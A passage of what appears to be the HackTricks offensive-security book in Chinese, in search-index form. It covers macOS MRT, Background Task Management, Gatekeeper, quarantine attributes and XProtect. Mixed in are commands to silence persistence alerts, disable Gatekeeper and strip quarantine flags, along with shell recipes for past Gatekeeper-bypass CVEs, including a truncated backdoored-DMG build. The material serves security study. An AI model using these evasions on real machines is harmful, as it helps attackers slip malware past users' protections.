上检测到恶意软件(无论是通过 XProtect 还是其他方式),可以使用 MRT 自动 移除恶意软件 。MRT 在后台静默运行,通常在系统更新或下载新恶意软件定义时运行(看起来 MRT 检测恶意软件的规则在二进制文件中)。 虽然 XProtect 和 MRT 都是 macOS 安全措施的一部分,但它们执行不同的功能: XProtect 是一种预防工具。它 检查下载的文件 (通过某些应用程序),如果检测到任何已知类型的恶意软件,它 阻止文件打开 ,从而防止恶意软件首先感染您的系统。 MRT 则是一个 反应工具 。它在系统检测到恶意软件后运行,旨在移除有问题的软件以清理系统。 MRT 应用程序位于 /Library/Apple/System/Library/CoreServices/MRT.app","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » MRT - 恶意软件移除工具","id":"2548","title":"MRT - 恶意软件移除工具"},"2549":{"body":"macOS 现在 **会在每次工具使用众所周知的 技术来保持代码执行 (如登录项、守护进程...)时发出警报,以便用户更好地了解 哪些软件在持续运行 。 这通过位于 /System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd 的 守护进程 和位于 /System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app 的 代理 运行。 backgroundtaskmanagementd 知道某些东西安装在持久文件夹中的方式是通过 获取 FSEvents 并为这些事件创建一些 处理程序 。 此外,还有一个 plist 文件,包含 众所周知的应用程序 ,这些应用程序经常保持由苹果维护,位于:/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist json [...]\\n\\"us.zoom.ZoomDaemon\\" => {\\n\\"AssociatedBundleIdentifiers\\" => [\\n0 => \\"us.zoom.xos\\"\\n]\\n\\"Attribution\\" => \\"Zoom\\"\\n\\"Program\\" => \\"/Library/PrivilegedHelperTools/us.zoom.ZoomDaemon\\"\\n\\"ProgramArguments\\" => [\\n0 => \\"/Library/PrivilegedHelperTools/us.zoom.ZoomDaemon\\"\\n]\\n\\"TeamIdentifier\\" => \\"BJ4HAAB9B3\\"\\n}\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 背景任务管理","id":"2549","title":"背景任务管理"},"255":{"body":"安全测试: 使用像Scapy这样的工具,攻击者重放针对特定媒体端口的DTLS ClientHello消息。为了进行伦理测试,对Chromium进行修改(例如,JsepTransport::AddRemoteCandidates)以安全地模拟受害者行为。 缓解措施: 解决方案包括丢弃来自未验证地址的数据包,如在libnice等库的新版本中实现的那样。主要解决方案强调信任ICE验证过程,仅处理来自验证的IP和端口组合的数据包。","breadcrumbs":"Pentesting Network » WebRTC DoS » 测试和缓解","id":"255","title":"测试和缓解"},"2550":{"body":"可以使用 Apple cli 工具 枚举所有 配置的后台项目: bash # The tool will always ask for the users password\\nsfltool dumpbtm 此外,还可以使用 DumpBTM 列出这些信息。 bash # You need to grant the Terminal Full Disk Access for this to work\\nchmod +x dumpBTM\\nxattr -rc dumpBTM # Remove quarantine attr\\n./dumpBTM 此信息存储在 /private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm 中,终端需要 FDA。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 枚举","id":"2550","title":"枚举"},"2551":{"body":"当发现新的持久性时,会生成类型为 ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD 的事件。因此,任何 防止 该 事件 被发送或 代理不警告 用户的方法都将帮助攻击者 绕过 BTM。 重置数据库 :运行以下命令将重置数据库(应该从头开始重建),但是,由于某种原因,运行此命令后, 在系统重启之前不会警告任何新的持久性 。 需要 root 权限。 bash # Reset the database\\nsfltool resettbtm 停止代理 :可以向代理发送停止信号,以便它 不会在发现新检测时提醒用户 。 bash # Get PID\\npgrep BackgroundTaskManagementAgent\\n1011 # Stop it\\nkill -SIGSTOP 1011 # Check it\'s stopped (a T means it\'s stopped)\\nps -o state 1011\\nT 漏洞 :如果 创建持久性的进程在其后快速存在 ,守护进程将尝试 获取信息 , 失败 ,并且 无法发送事件 ,指示新的事物正在持久化。 参考和 关于BTM的更多信息 : https://youtu.be/9hjUmT031tc?t=26481 https://www.patreon.com/posts/new-developer-77420730?l=fr https://support.apple.com/en-gb/guide/deployment/depdca572563/web tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 操作 BTM","id":"2551","title":"操作 BTM"},"2552":{"body":"Reading time: 32 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » macOS Gatekeeper / Quarantine / XProtect","id":"2552","title":"macOS Gatekeeper / Quarantine / XProtect"},"2553":{"body":"Gatekeeper 是为 Mac 操作系统开发的安全功能,旨在确保用户 仅运行受信任的软件 。它通过 验证用户下载并尝试从 App Store 以外的来源打开的软件 来实现,例如应用程序、插件或安装包。 Gatekeeper 的关键机制在于其 验证 过程。它检查下载的软件是否 由认可的开发者签名 ,以确保软件的真实性。此外,它还确认该软件是否 经过 Apple 的公证 ,以确保其不含已知的恶意内容,并且在公证后未被篡改。 此外,Gatekeeper 通过 提示用户首次批准打开 下载的软件来增强用户控制和安全性。此保护措施有助于防止用户无意中运行可能有害的可执行代码,这些代码可能被误认为是无害的数据文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » Gatekeeper","id":"2553","title":"Gatekeeper"},"2554":{"body":"应用程序签名,也称为代码签名,是 Apple 安全基础设施的关键组成部分。它们用于 验证软件作者的身份 (开发者),并确保自上次签名以来代码未被篡改。 其工作原理如下: 签名应用程序: 当开发者准备分发他们的应用程序时,他们 使用私钥签名应用程序 。此私钥与 Apple 在开发者注册 Apple Developer Program 时向开发者颁发的 证书 相关联。签名过程涉及创建应用程序所有部分的加密哈希,并使用开发者的私钥对该哈希进行加密。 分发应用程序: 签名的应用程序随后与开发者的证书一起分发,该证书包含相应的公钥。 验证应用程序: 当用户下载并尝试运行该应用程序时,他们的 Mac 操作系统使用开发者证书中的公钥解密哈希。然后,它根据应用程序的当前状态重新计算哈希,并将其与解密后的哈希进行比较。如果它们匹配,则意味着 自开发者签名以来,应用程序未被修改 ,系统允许该应用程序运行。 应用程序签名是 Apple Gatekeeper 技术的重要组成部分。当用户尝试 打开从互联网下载的应用程序 时,Gatekeeper 会验证应用程序签名。如果它是由 Apple 向已知开发者颁发的证书签名,并且代码未被篡改,Gatekeeper 允许该应用程序运行。否则,它会阻止该应用程序并提醒用户。 从 macOS Catalina 开始, Gatekeeper 还检查应用程序是否经过 Apple 的公证 ,增加了一层额外的安全性。公证过程检查应用程序是否存在已知的安全问题和恶意代码,如果这些检查通过,Apple 会向应用程序添加一个 Gatekeeper 可以验证的票据。 检查签名 在检查某些 恶意软件样本 时,您应始终 检查二进制文件的签名 ,因为 签名的开发者 可能已经 与恶意软件相关 。 bash # Get signer\\ncodesign -vv -d /bin/ls 2>&1 | grep -E \\"Authority|TeamIdentifier\\" # Check if the app’s contents have been modified\\ncodesign --verify --verbose /Applications/Safari.app # Get entitlements from the binary\\ncodesign -d --entitlements :- /System/Applications/Automator.app # Check the TCC perms # Check if the signature is valid\\nspctl --assess --verbose /Applications/Safari.app # Sign a binary\\ncodesign -s toolsdemo","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 应用程序签名","id":"2554","title":"应用程序签名"},"2555":{"body":"苹果的 notarization 过程作为额外的保护措施,旨在保护用户免受潜在有害软件的影响。它涉及 开发者提交他们的应用程序进行审查 ,由 苹果的 Notary Service 进行,这与应用审核不应混淆。该服务是一个 自动化系统 ,对提交的软件进行审查,以检查 恶意内容 和任何潜在的代码签名问题。 如果软件 通过 了这次检查而没有引发任何问题,Notary Service 会生成一个 notarization ticket。开发者随后需要 将此票据附加到他们的软件上 ,这个过程称为“stapling”。此外,notarization ticket 还会在线发布,Gatekeeper,苹果的安全技术,可以访问它。 在用户首次安装或执行软件时,notarization ticket 的存在 - 无论是附加在可执行文件上还是在线找到 - 通知 Gatekeeper 该软件已由苹果进行 notarization 。因此,Gatekeeper 在初始启动对话框中显示描述性消息,指示该软件已通过苹果的恶意内容检查。这个过程增强了用户对他们在系统上安装或运行的软件安全性的信心。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » Notarization","id":"2555","title":"Notarization"},"2556":{"body":"caution 请注意,从 Sequoia 版本开始, spctl 不再允许修改 Gatekeeper 配置。 spctl 是用于枚举和与 Gatekeeper 交互的 CLI 工具(通过 XPC 消息与 syspolicyd 守护进程交互)。例如,可以使用以下命令查看 GateKeeper 的 状态 : bash # Check the status\\nspctl --status caution 注意,GateKeeper 签名检查仅对 具有隔离属性的文件 进行,而不是对每个文件进行。 GateKeeper 将检查根据 首选项和签名 二进制文件是否可以执行: syspolicyd 是负责执行 Gatekeeper 的主要守护进程。它维护一个位于 /var/db/SystemPolicy 的数据库,可以在 这里找到支持该数据库的代码 ,在 这里找到 SQL 模板 。请注意,该数据库不受 SIP 限制,并且可以由 root 写入,数据库 /var/db/.SystemPolicy-default 用作原始备份,以防其他数据库损坏。 此外, /var/db/gke.bundle 和 /var/db/gkopaque.bundle 包含插入数据库的规则文件。您可以使用 root 检查此数据库: bash # Open database\\nsqlite3 /var/db/SystemPolicy # Get allowed rules\\nSELECT requirement,allow,disabled,label from authority where label != \'GKE\' and disabled=0;\\nrequirement|allow|disabled|label\\nanchor apple generic and certificate 1[subject.CN] = \\"Apple Software Update Certification Authority\\"|1|0|Apple Installer\\nanchor apple|1|0|Apple System\\nanchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists|1|0|Mac App Store\\nanchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID\\n[...] syspolicyd 还暴露了一个 XPC 服务器,具有不同的操作,如 assess、update、record 和 cancel,这些操作也可以通过 Security.framework 的 SecAssessment* API 访问,而 spctl 实际上通过 XPC 与 syspolicyd 进行通信。 注意第一个规则以 \\" App Store \\" 结束,第二个规则以 \\" Developer ID \\" 结束,并且在之前的图像中,它是 启用从 App Store 和已识别开发者执行应用程序 。 如果您 修改 该设置为 App Store,\\" Notarized Developer ID\\" 规则将消失 。 还有成千上万的 type GKE 规则: bash SELECT requirement,allow,disabled,label from authority where label = \'GKE\' limit 5;\\ncdhash H\\"b40281d347dc574ae0850682f0fd1173aa2d0a39\\"|1|0|GKE\\ncdhash H\\"5fd63f5342ac0c7c0774ebcbecaf8787367c480f\\"|1|0|GKE\\ncdhash H\\"4317047eefac8125ce4d44cab0eb7b1dff29d19a\\"|1|0|GKE\\ncdhash H\\"0a71962e7a32f0c2b41ddb1fb8403f3420e1d861\\"|1|0|GKE\\ncdhash H\\"8d0d90ff23c3071211646c4c9c607cdb601cb18f\\"|1|0|GKE 这些是来自以下路径的哈希值: /var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth /var/db/gke.bundle/Contents/Resources/gk.db /var/db/gkopaque.bundle/Contents/Resources/gkopaque.db 或者你可以用以下方式列出之前的信息: bash sudo spctl --list 选项 --master-disable 和 --global-disable 的 spctl 将完全 禁用 这些签名检查: bash # Disable GateKeeper\\nspctl --global-disable\\nspctl --master-disable # Enable it\\nspctl --global-enable\\nspctl --master-enable 当完全启用时,将出现一个新选项: 可以通过以下方式 检查一个应用是否会被 GateKeeper 允许 : bash spctl --assess -v /Applications/App.app 可以在 GateKeeper 中添加新规则,以允许某些应用程序的执行: bash # Check if allowed - nop\\nspctl --assess -v /Applications/App.app\\n/Applications/App.app: rejected\\nsource=no usable signature # Add a label and allow this label in GateKeeper\\nsudo spctl --add --label \\"whitelist\\" /Applications/App.app\\nsudo spctl --enable --label \\"whitelist\\" # Check again - yep\\nspctl --assess -v /Applications/App.app\\n/Applications/App.app: accepted 关于 内核扩展 ,文件夹 /var/db/SystemPolicyConfiguration 包含允许加载的 kext 列表文件。此外,spctl 拥有 com.apple.private.iokit.nvram-csr 权限,因为它能够添加需要在 NVRAM 中以 kext-allowed-teams 键保存的新预批准内核扩展。 在 macOS 15 (Sequoia) 及更高版本上管理 Gatekeeper 从 macOS 15 Sequoia 开始,最终用户无法再通过 spctl 切换 Gatekeeper 策略。管理通过系统设置进行,或通过部署带有 com.apple.systempolicy.control 负载的 MDM 配置文件进行。示例配置文件片段以允许 App Store 和已识别的开发者(但不允许“任何地方”): xml \\n\\n\\n\\nPayloadContent\\n\\n\\nPayloadType\\ncom.apple.systempolicy.control\\nPayloadVersion\\n1\\nPayloadIdentifier\\ncom.example.gatekeeper\\nEnableAssessment\\n\\nAllowIdentifiedDevelopers\\n\\n\\n\\nPayloadType\\nConfiguration\\nPayloadIdentifier\\ncom.example.profile.gatekeeper\\nPayloadUUID\\n00000000-0000-0000-0000-000000000000\\nPayloadVersion\\n1\\nPayloadDisplayName\\nGatekeeper\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » spctl & syspolicyd","id":"2556","title":"spctl & syspolicyd"},"2557":{"body":"在 下载 应用程序或文件时,特定的 macOS 应用程序 (如网页浏览器或电子邮件客户端)会为下载的文件 附加一个扩展文件属性 ,通常称为“ 隔离标志 ”。此属性作为安全措施, 标记文件 来自不受信任的来源(互联网),并可能带来风险。然而,并非所有应用程序都会附加此属性,例如,常见的 BitTorrent 客户端软件通常会绕过此过程。 隔离标志的存在在用户尝试执行文件时向 macOS 的 Gatekeeper 安全功能发出信号 。 在 隔离标志不存在 的情况下(例如通过某些 BitTorrent 客户端下载的文件),Gatekeeper 的 检查可能不会执行 。因此,用户在打开来自不太安全或未知来源的文件时应保持谨慎。 [!NOTE] > 检查 代码签名的 有效性 是一个 资源密集型 的过程,包括生成代码及其所有捆绑资源的加密 哈希 。此外,检查证书有效性还涉及对 Apple 服务器进行 在线检查 ,以查看其在发放后是否被撤销。因此,完整的代码签名和公证检查在每次启动应用程序时 不切实际 。 因此,这些检查 仅在执行具有隔离属性的应用程序时运行 。 warning 此属性必须由 创建/下载 文件的应用程序 设置 。 然而,被沙盒化的文件将对它们创建的每个文件设置此属性。而非沙盒应用程序可以自行设置,或在 Info.plist 中指定 LSFileQuarantineEnabled 键,这将使系统在创建的文件上设置com.apple.quarantine扩展属性。 此外,所有调用**qtn_proc_apply_to_self**的进程创建的文件都将被隔离。或者,API **qtn_file_apply_to_path**将隔离属性添加到指定的文件路径。 可以使用以下命令 检查其状态并启用/禁用 (需要 root 权限): bash spctl --status\\nassessments enabled spctl --enable\\nspctl --disable\\n#You can also allow nee identifies to execute code using the binary \\"spctl\\" 您还可以通过以下方式 查找文件是否具有隔离扩展属性 : bash xattr file.png\\ncom.apple.macl\\ncom.apple.quarantine 检查 扩展 属性 的 值 ,并找出写入隔离属性的应用程序: bash xattr -l portada.png\\ncom.apple.macl:\\n00000000 03 00 53 DA 55 1B AE 4C 4E 88 9D CA B7 5C 50 F3 |..S.U..LN.....P.|\\n00000010 16 94 03 00 27 63 64 97 98 FB 4F 02 84 F3 D0 DB |....\'cd...O.....|\\n00000020 89 53 C3 FC 03 00 27 63 64 97 98 FB 4F 02 84 F3 |.S....\'cd...O...|\\n00000030 D0 DB 89 53 C3 FC 00 00 00 00 00 00 00 00 00 00 |...S............|\\n00000040 00 00 00 00 00 00 00 00 |........|\\n00000048\\ncom.apple.quarantine: 00C1;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5\\n# 00c1 -- It has been allowed to eexcute this file (QTN_FLAG_USER_APPROVED = 0x0040)\\n# 607842eb -- Timestamp\\n# Brave -- App\\n# F643CD5F-6071-46AB-83AB-390BA944DEC5 -- UID assigned to the file downloaded 实际上,一个进程“可以为它创建的文件设置隔离标志”(我已经尝试在创建的文件中应用 USER_APPROVED 标志,但它不会应用): 源代码应用隔离标志\\nc #include \\n#include enum qtn_flags {\\nQTN_FLAG_DOWNLOAD = 0x0001,\\nQTN_FLAG_SANDBOX = 0x0002,\\nQTN_FLAG_HARD = 0x0004,\\nQTN_FLAG_USER_APPROVED = 0x0040,\\n}; #define qtn_proc_alloc _qtn_proc_alloc\\n#define qtn_proc_apply_to_self _qtn_proc_apply_to_self\\n#define qtn_proc_free _qtn_proc_free\\n#define qtn_proc_init _qtn_proc_init\\n#define qtn_proc_init_with_self _qtn_proc_init_with_self\\n#define qtn_proc_set_flags _qtn_proc_set_flags\\n#define qtn_file_alloc _qtn_file_alloc\\n#define qtn_file_init_with_path _qtn_file_init_with_path\\n#define qtn_file_free _qtn_file_free\\n#define qtn_file_apply_to_path _qtn_file_apply_to_path\\n#define qtn_file_set_flags _qtn_file_set_flags\\n#define qtn_file_get_flags _qtn_file_get_flags\\n#define qtn_proc_set_identifier _qtn_proc_set_identifier typedef struct _qtn_proc *qtn_proc_t;\\ntypedef struct _qtn_file *qtn_file_t; int qtn_proc_apply_to_self(qtn_proc_t);\\nvoid qtn_proc_init(qtn_proc_t);\\nint qtn_proc_init_with_self(qtn_proc_t);\\nint qtn_proc_set_flags(qtn_proc_t, uint32_t flags);\\nqtn_proc_t qtn_proc_alloc();\\nvoid qtn_proc_free(qtn_proc_t);\\nqtn_file_t qtn_file_alloc(void);\\nvoid qtn_file_free(qtn_file_t qf);\\nint qtn_file_set_flags(qtn_file_t qf, uint32_t flags);\\nuint32_t qtn_file_get_flags(qtn_file_t qf);\\nint qtn_file_apply_to_path(qtn_file_t qf, const char *path);\\nint qtn_file_init_with_path(qtn_file_t qf, const char *path);\\nint qtn_proc_set_identifier(qtn_proc_t qp, const char* bundleid); int main() { qtn_proc_t qp = qtn_proc_alloc();\\nqtn_proc_set_identifier(qp, \\"xyz.hacktricks.qa\\");\\nqtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED);\\nqtn_proc_apply_to_self(qp);\\nqtn_proc_free(qp); FILE *fp;\\nfp = fopen(\\"thisisquarantined.txt\\", \\"w+\\");\\nfprintf(fp, \\"Hello Quarantine\\\\n\\");\\nfclose(fp); return 0; } 并 移除 该属性: bash xattr -d com.apple.quarantine portada.png\\n#You can also remove this attribute from every file with\\nfind . -iname \'*\' -print0 | xargs -0 xattr -d com.apple.quarantine 并使用以下命令查找所有隔离的文件: bash find / -exec ls -ld {} \\\\; 2>/dev/null | grep -E \\"[x\\\\-]@ \\" | awk \'{printf $9; printf \\"\\\\n\\"}\' | xargs -I {} xattr -lv {} | grep \\"com.apple.quarantine\\" Quarantine information is also stored in a central database managed by LaunchServices in ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 which allows the GUI to obtain data about the file origins. Moreover this can be overwritten by applications which might be interested in hiding its origins. Moreover, this can be done from LaunchServices APIS. libquarantine.dylib 这个库导出几个函数,允许操作扩展属性字段。 qtn_file_* APIs 处理文件隔离政策,qtn_proc_* APIs 应用于进程(由进程创建的文件)。未导出的 __qtn_syscall_quarantine* 函数是应用政策的函数,它调用 mac_syscall,第一个参数为 \\"Quarantine\\",将请求发送到 Quarantine.kext。 Quarantine.kext 内核扩展仅通过 系统上的内核缓存 可用;然而,你 可以 从 https://developer.apple.com/ 下载 Kernel Debug Kit ,其中将包含该扩展的符号化版本。 这个 Kext 将通过 MACF 钩住多个调用,以捕获所有文件生命周期事件:创建、打开、重命名、硬链接... 甚至 setxattr 以防止其设置 com.apple.quarantine 扩展属性。 它还使用了一些 MIBs: security.mac.qtn.sandbox_enforce: 强制隔离与沙箱 security.mac.qtn.user_approved_exec: 隔离的进程只能执行已批准的文件 Provenance xattr (Ventura 及更高版本) macOS 13 Ventura 引入了一个单独的来源机制,该机制在第一次允许隔离应用运行时填充。创建了两个工件: .app 包目录上的 com.apple.provenance xattr(固定大小的二进制值,包含主键和标志)。 在 /var/db/SystemPolicyConfiguration/ExecPolicy/ 内的 ExecPolicy 数据库中的 provenance_tracking 表中的一行,存储应用的 cdhash 和元数据。 Practical usage: bash # Inspect provenance xattr (if present)\\nxattr -p com.apple.provenance /Applications/Some.app | hexdump -C # Observe Gatekeeper/provenance events in real time\\nlog stream --style syslog --predicate \'process == \\"syspolicyd\\"\' # Retrieve historical Gatekeeper decisions for a specific bundle\\nlog show --last 2d --style syslog --predicate \'process == \\"syspolicyd\\" && eventMessage CONTAINS[cd] \\"GK scan\\"\'","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 隔离文件","id":"2557","title":"隔离文件"},"2558":{"body":"XProtect 是 macOS 中内置的 反恶意软件 功能。XProtect 在应用程序首次启动或修改时检查其与已知恶意软件和不安全文件类型的数据库 。当您通过某些应用程序(如 Safari、Mail 或 Messages)下载文件时,XProtect 会自动扫描该文件。如果它与数据库中的任何已知恶意软件匹配,XProtect 将 阻止文件运行 并提醒您存在威胁。 XProtect 数据库由 Apple 定期更新 新的恶意软件定义,这些更新会自动下载并安装到您的 Mac 上。这确保了 XProtect 始终与最新的已知威胁保持同步。 然而,值得注意的是 XProtect 不是一个功能齐全的杀毒解决方案 。它仅检查特定的已知威胁列表,并不像大多数杀毒软件那样执行按需扫描。 您可以获取有关最新 XProtect 更新的信息: bash system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 \\"XProtectPlistConfigData\\" | tail -n 5 XProtect 位于 SIP 保护位置 /Library/Apple/System/Library/CoreServices/XProtect.bundle ,在该捆绑包中可以找到 XProtect 使用的信息: XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist :允许具有这些 cdhash 的代码使用遗留权限。 XProtect.bundle/Contents/Resources/XProtect.meta.plist :不允许通过 BundleID 和 TeamID 加载的插件和扩展的列表,或指示最低版本。 XProtect.bundle/Contents/Resources/XProtect.yara :检测恶意软件的 Yara 规则。 XProtect.bundle/Contents/Resources/gk.db :包含被阻止应用程序和 TeamIDs 哈希的 SQLite3 数据库。 请注意, /Library/Apple/System/Library/CoreServices/XProtect.app 中还有另一个与 XProtect 相关的应用程序,但它与 Gatekeeper 过程无关。 XProtect Remediator:在现代 macOS 中,Apple 提供按需扫描器(XProtect Remediator),定期通过 launchd 运行以检测和修复恶意软件家族。您可以在统一日志中观察这些扫描: log show --last 2h --predicate \'subsystem == \\"com.apple.XProtectFramework\\" || category CONTAINS \\"XProtect\\"\' --style syslog","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » XProtect","id":"2558","title":"XProtect"},"2559":{"body":"caution 请注意,Gatekeeper 并不是每次 执行应用程序时都会被执行,只有 AppleMobileFileIntegrity (AMFI) 会在您执行已经由 Gatekeeper 执行和验证的应用程序时 验证可执行代码签名 。 因此,之前可以执行一个应用程序以便用 Gatekeeper 缓存它,然后 修改应用程序的非可执行文件 (如 Electron asar 或 NIB 文件),如果没有其他保护措施,应用程序将 执行 带有 恶意 附加内容的版本。 然而,现在这已不再可能,因为 macOS 防止修改 应用程序捆绑包中的文件。因此,如果您尝试 Dirty NIB 攻击,您会发现不再可能利用它,因为在执行应用程序以用 Gatekeeper 缓存它后,您将无法修改捆绑包。如果您例如将 Contents 目录的名称更改为 NotCon(如漏洞中所示),然后执行应用程序的主二进制文件以用 Gatekeeper 缓存它,将会触发错误并且无法执行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 不是 Gatekeeper","id":"2559","title":"不是 Gatekeeper"},"256":{"body":"DTLS服务器配置: 浏览器充当DTLS服务器的实例或媒体服务器未使用临时端口进行媒体会话的情况不易受到此漏洞的影响。","breadcrumbs":"Pentesting Network » WebRTC DoS » 非易受攻击场景","id":"256","title":"非易受攻击场景"},"2560":{"body":"任何绕过 Gatekeeper 的方法(设法让用户下载某些内容并在 Gatekeeper 应该禁止时执行它)都被视为 macOS 中的漏洞。这些是一些分配给过去允许绕过 Gatekeeper 的技术的 CVE:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » Gatekeeper 绕过","id":"2560","title":"Gatekeeper 绕过"},"2561":{"body":"观察到如果使用 Archive Utility 进行提取,路径超过 886 个字符 的文件不会接收 com.apple.quarantine 扩展属性。这种情况无意中允许这些文件 绕过 Gatekeeper 的 安全检查。 查看 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2021-1810","id":"2561","title":"CVE-2021-1810"},"2562":{"body":"当使用 Automator 创建应用程序时,关于其执行所需的信息位于 application.app/Contents/document.wflow 中,而不在可执行文件中。可执行文件只是一个名为 Automator Application Stub 的通用 Automator 二进制文件。 因此,您可以使 application.app/Contents/MacOS/Automator\\\\ Application\\\\ Stub 通过符号链接指向系统内的另一个 Automator Application Stub ,它将执行 document.wflow 中的内容(您的脚本) 而不会触发 Gatekeeper ,因为实际的可执行文件没有隔离 xattr。 示例预期位置:/System/Library/CoreServices/Automator\\\\ Application\\\\ Stub.app/Contents/MacOS/Automator\\\\ Application\\\\ Stub 查看 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2021-30990","id":"2562","title":"CVE-2021-30990"},"2563":{"body":"在此绕过中,创建了一个 zip 文件,应用程序开始从 application.app/Contents 压缩,而不是从 application.app。因此, 隔离属性 应用于所有 来自 application.app/Contents 的文件 ,但 不适用于 application.app ,这是 Gatekeeper 检查的内容,因此 Gatekeeper 被绕过,因为当触发 application.app 时 没有隔离属性。 bash zip -r test.app/Contents test.zip 查看 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2022-22616","id":"2563","title":"CVE-2022-22616"},"2564":{"body":"即使组件不同,此漏洞的利用与之前的非常相似。在这种情况下,将从 application.app/Contents 生成一个 Apple Archive,因此 application.app 在通过 Archive Utility 解压时不会获得隔离属性 。 bash aa archive -d test.app/Contents -o test.app.aar 检查 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2022-32910","id":"2564","title":"CVE-2022-32910"},"2565":{"body":"ACL writeextattr 可用于防止任何人向文件中写入属性: bash touch /tmp/no-attr\\nchmod +a \\"everyone deny writeextattr\\" /tmp/no-attr\\nxattr -w attrname vale /tmp/no-attr\\nxattr: [Errno 13] Permission denied: \'/tmp/no-attr\' 此外, AppleDouble 文件格式复制了一个文件及其 ACE。 在 源代码 中,可以看到存储在名为 com.apple.acl.text 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此,如果您将一个应用程序压缩成一个带有 ACL 的 AppleDouble 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 那么隔离 xattr 并没有被设置到该应用程序中: bash chmod +a \\"everyone deny write,writeattr,writeextattr\\" /tmp/test\\nditto -c -k test test.zip\\npython3 -m http.server\\n# Download the zip from the browser and decompress it, the file should be without a quarantine xattr 查看 原始报告 以获取更多信息。 请注意,这也可以通过AppleArchives进行利用: bash mkdir app\\ntouch app/test\\nchmod +a \\"everyone deny write,writeattr,writeextattr\\" app/test\\naa archive -d app -o test.aar","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2022-42821","id":"2565","title":"CVE-2022-42821"},"2566":{"body":"发现 Google Chrome没有为下载的文件设置隔离属性 ,这是由于一些macOS内部问题。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2023-27943","id":"2566","title":"CVE-2023-27943"},"2567":{"body":"AppleDouble文件格式将文件的属性存储在以._开头的单独文件中,这有助于在 macOS机器之间 复制文件属性。然而,注意到在解压AppleDouble文件后,以._开头的文件 没有被赋予隔离属性 。 bash mkdir test\\necho a > test/a\\necho b > test/b\\necho ._a > test/._a\\naa archive -d test/ -o test.aar # If you downloaded the resulting test.aar and decompress it, the file test/._a won\'t have a quarantitne attribute 能够创建一个不会设置隔离属性的文件,使得 能够绕过 Gatekeeper。 这个技巧是 使用 AppleDouble 命名约定创建一个 DMG 文件应用程序 (以 ._ 开头),并创建一个 作为此隐藏文件的符号链接的可见文件 ,而没有隔离属性。 当 dmg 文件被执行 时,由于它没有隔离属性,它将 绕过 Gatekeeper。 bash # Create an app bundle with the backdoor an call it app.app echo \\"[+] creating disk image with app\\"\\nhdiutil create -srcfolder app.app app.dmg echo \\"[+] creating directory and files\\"\\nmkdir\\nmkdir -p s/app\\ncp app.dmg s/app/._app.dmg\\nln -s ._app.dmg s/app/app.dmg echo 